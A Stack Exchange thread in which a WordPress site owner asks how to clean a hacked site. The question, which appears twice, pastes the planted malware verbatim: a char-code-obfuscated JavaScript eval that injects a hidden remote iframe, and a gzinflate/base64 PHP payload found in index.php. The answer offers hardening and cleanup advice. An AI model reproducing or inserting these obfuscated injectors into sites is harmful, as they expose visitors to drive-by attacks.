Possible Duplicate:
Wordpress Trojan issue help!

I accessed the wordpress website I am building and received a warning about a trojan from my anti virus software. I have now checked the site with various online scanners and it appears that someone has planted an inline frame containing the code posted below...

I didnt even know wordpress could get infected in this way. Please help me out!

Here is a screenshot of the antivirus warning.

.png

and here is some of the malicious code script code planted on my site.

• if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'mChar';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'mChar';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);

and inside the index.php

1. 1583b0# echo(gzinflate(base64_decode("1VZNc5swEP0r3VwEZbCRMJIYQi7pvYceXR8YGxIyiZ0ALelk8t+7u4jEIbabHnroDPIs0tun/XhCPm/XTX3fXdSV19fbza5fio0IxA7HGscPHHc4ym0nVn5R5PPv/XxWPpZrb1v2n74UXen5/gw9y8dgucoKhIhIZF3z6wkp51LFDn5WnDkc5ImfPa+Lbn3tPTw8+E9tm3/rmnp7lT2jT1EMsK9kFj7keSj9KhdhHAENrUHHEBqQoCUYBToCY8HgigKDMwYM6AW/GSCHlO39dQ3KgFWwSCCxBI5TMgaMhAiSlJklgSJQkChAxAItu4AxktdoTPLqjrZEnHrFWE3h4hJGglujga9TnqOp2IgocR9jhujCBJQ8sHHIiREWI6awdcIM+MQgU7DASGbUzKgHY8Fbp8RnmQmDcQXUVMuI1tHTEpcFLpXk6kuMh4tFgeEm2JSEXqWlJYQlbKSMtSMwwgnEIUXqZtF38Iq4NENZOX+Mj3NhJ16liBUDFi7DCcBwqaxyjedVk3IFNf0mbOvU1RSBWBxXEM5qKD42EOtmlPOiWDS/SsInHLfRrnTGuvaoUW/UHEPIlJkMu8YvE9iimNpoDzQSV6jHUwmNSol5N8l92QsqNMfFOBGbGdSesA+fJcXyOXGeBhFyT4dEDx4sOjrvg4iGXGjW6Z+apkdxJq4pLzUklhclo7z+Vym/yXpfkuYPehxP70SR0Qm+I0plpmNaPcG3r2HmSE/uPqr7EPRD7Z4c+aHp7kj/vXjefyLeE37s4/uv7hHDsJiegQ0hyo49H0RGOU8+AmLW3t/WnSdA+NndJheFyMp8vLhLvKh/FrdilfV5lbW5EFnV5KLC6YYu9LvL66IRWZO37bJqAnG525QIrnaNV+dRFl3UYT+7LbdX3XVWB4H/dJPXSNMGjRengfzcL29W/vE7uvRaPzufuz8UvwE=")));

   /1583b0

How can i remove this and recover the site???

Possible Duplicate:
Wordpress Trojan issue help!

I accessed the wordpress website I am building and received a warning about a trojan from my anti virus software. I have now checked the site with various online scanners and it appears that someone has planted an inline frame containing the code posted below...

I didnt even know wordpress could get infected in this way. Please help me out!

Here is a screenshot of the antivirus warning.

https://i.sstatic/NaSE6.png

and here is some of the malicious code script code planted on my site.

• if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'mChar';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'mChar';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);

and inside the index.php

1. 1583b0# echo(gzinflate(base64_decode("1VZNc5swEP0r3VwEZbCRMJIYQi7pvYceXR8YGxIyiZ0ALelk8t+7u4jEIbabHnroDPIs0tun/XhCPm/XTX3fXdSV19fbza5fio0IxA7HGscPHHc4ym0nVn5R5PPv/XxWPpZrb1v2n74UXen5/gw9y8dgucoKhIhIZF3z6wkp51LFDn5WnDkc5ImfPa+Lbn3tPTw8+E9tm3/rmnp7lT2jT1EMsK9kFj7keSj9KhdhHAENrUHHEBqQoCUYBToCY8HgigKDMwYM6AW/GSCHlO39dQ3KgFWwSCCxBI5TMgaMhAiSlJklgSJQkChAxAItu4AxktdoTPLqjrZEnHrFWE3h4hJGglujga9TnqOp2IgocR9jhujCBJQ8sHHIiREWI6awdcIM+MQgU7DASGbUzKgHY8Fbp8RnmQmDcQXUVMuI1tHTEpcFLpXk6kuMh4tFgeEm2JSEXqWlJYQlbKSMtSMwwgnEIUXqZtF38Iq4NENZOX+Mj3NhJ16liBUDFi7DCcBwqaxyjedVk3IFNf0mbOvU1RSBWBxXEM5qKD42EOtmlPOiWDS/SsInHLfRrnTGuvaoUW/UHEPIlJkMu8YvE9iimNpoDzQSV6jHUwmNSol5N8l92QsqNMfFOBGbGdSesA+fJcXyOXGeBhFyT4dEDx4sOjrvg4iGXGjW6Z+apkdxJq4pLzUklhclo7z+Vym/yXpfkuYPehxP70SR0Qm+I0plpmNaPcG3r2HmSE/uPqr7EPRD7Z4c+aHp7kj/vXjefyLeE37s4/uv7hHDsJiegQ0hyo49H0RGOU8+AmLW3t/WnSdA+NndJheFyMp8vLhLvKh/FrdilfV5lbW5EFnV5KLC6YYu9LvL66IRWZO37bJqAnG525QIrnaNV+dRFl3UYT+7LbdX3XVWB4H/dJPXSNMGjRengfzcL29W/vE7uvRaPzufuz8UvwE=")));

   /1583b0

How can i remove this and recover the site???

• security
• customization

• 1 make sure you remove the code from your index.php, and look at your access log to see how they got in there – Bainternet Commented Feb 23, 2012 at 1:21
• "migrated from webmasters.stackexchange 13 hours ago. This question came from our site for pro webmasters." - so, given that hacked-site questions are explicitly out of scope in our FAQ, once again, a sister SE site migrates an out-of-scope question to WPSE. When will this stop? – Chip Bennett Commented Feb 23, 2012 at 14:33
• @ChipBennett it is a wordpress centric question and I guess the expectation was that the wordpress stack would have some helpful advice for the OP - even if the question is specifically out of scope I would have thought someone would have put together a cleanup wiki entry - if only because people come here looking for help. This kind of thinking is why I use StackOverflow for WP questions and not the actual Wordpress site. – toomanyairmiles Commented Feb 23, 2012 at 15:11
• "even if the question is specifically out of scope..." - so, is it normal practice for SE sites to send questions to other SE sites, when the questions are knowingly out of scope? If so, then what is the point of even having a scope? – Chip Bennett Commented Feb 23, 2012 at 15:25
• @ChipBennett there are a number of things or question types that are effectively out of scope but frequently asked, and that's why the COMMUNITY WIKI exists, to HELP people. Jeez! – toomanyairmiles Commented Feb 23, 2012 at 16:27

1 Answer 1

Basic Security Steps

Since Wordpress is so popular there are a lot of drive by hacks knocking around taking advantage of flaws in basic security. All Wordpress users should take the following basic and easy steps to protect themselves:-

• Do not use wp_ as the database table prefix, use any string of random characters that appeals.
• Turn off Wordpress DB errors.
• Make sure your directory's are set to chmod 755 and files 644.
• Use a secure password generator (use at least 15 characters).
• Do not use admin as a username.
• Place a blank .htaccess file in the wp-admin directory.
• Read Wordpress hardening
• Check the Google Cache of your site for hidden malware, some cunning malware only displays its payload to the google bot.
• Remove <meta name="generator" content="WordPress X.X.X" /> from your site's header by placing remove_action('wp_head', 'wp_generator'); in your functions.php file (drive by attackers will not have an easy way to find which version they are targeting if you do this).

TimThumb Hack

There is also a very popular drive by hack associated with an old version of the popular tim thumb script, which causes a lot of problems for webmasters. Check your uploads directory for php files and ensure you've upgraded to the latest version of the script to avoid this.

Advice

I run about 10 different Wordpresses and have found the WP-Security plugin and account from website defender invaluable, it scans your site regularly and reports on security errors, malware, and even page errors via email so you can be assured that you know when something goes wrong.

WP-Firewall is also very useful for defense against 0-Day exploits and VirusTotal is handy if you suspect an infection.

Akismet and Disqus are useful tools for defending against comment spam, and you should read the webmaster pros community wiki on this subject.

Webmaster Tools

You should also sign up to Google Webmaster Tools, but if you suspect an infection, take all steps to find and clean it up first or you may end up with Google warning your users that yours is a reported attack site.

If it detects an infection Google will send an email to all of the following addresses abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@ so you should ensure that you have at least one of these in place and monitored.

Paid Removal Services / Where To Get Help

There are also a number of sites which offer paid malware removal services, I would be very suspicious of these - many appear to be scams of one sort or another.

There is plenty of high quality help and support available for free in the wordpress forums, on webmaster pro's, the wordpress stackexchange site and on stackoverflow. Don't pay for things you can fix on your own.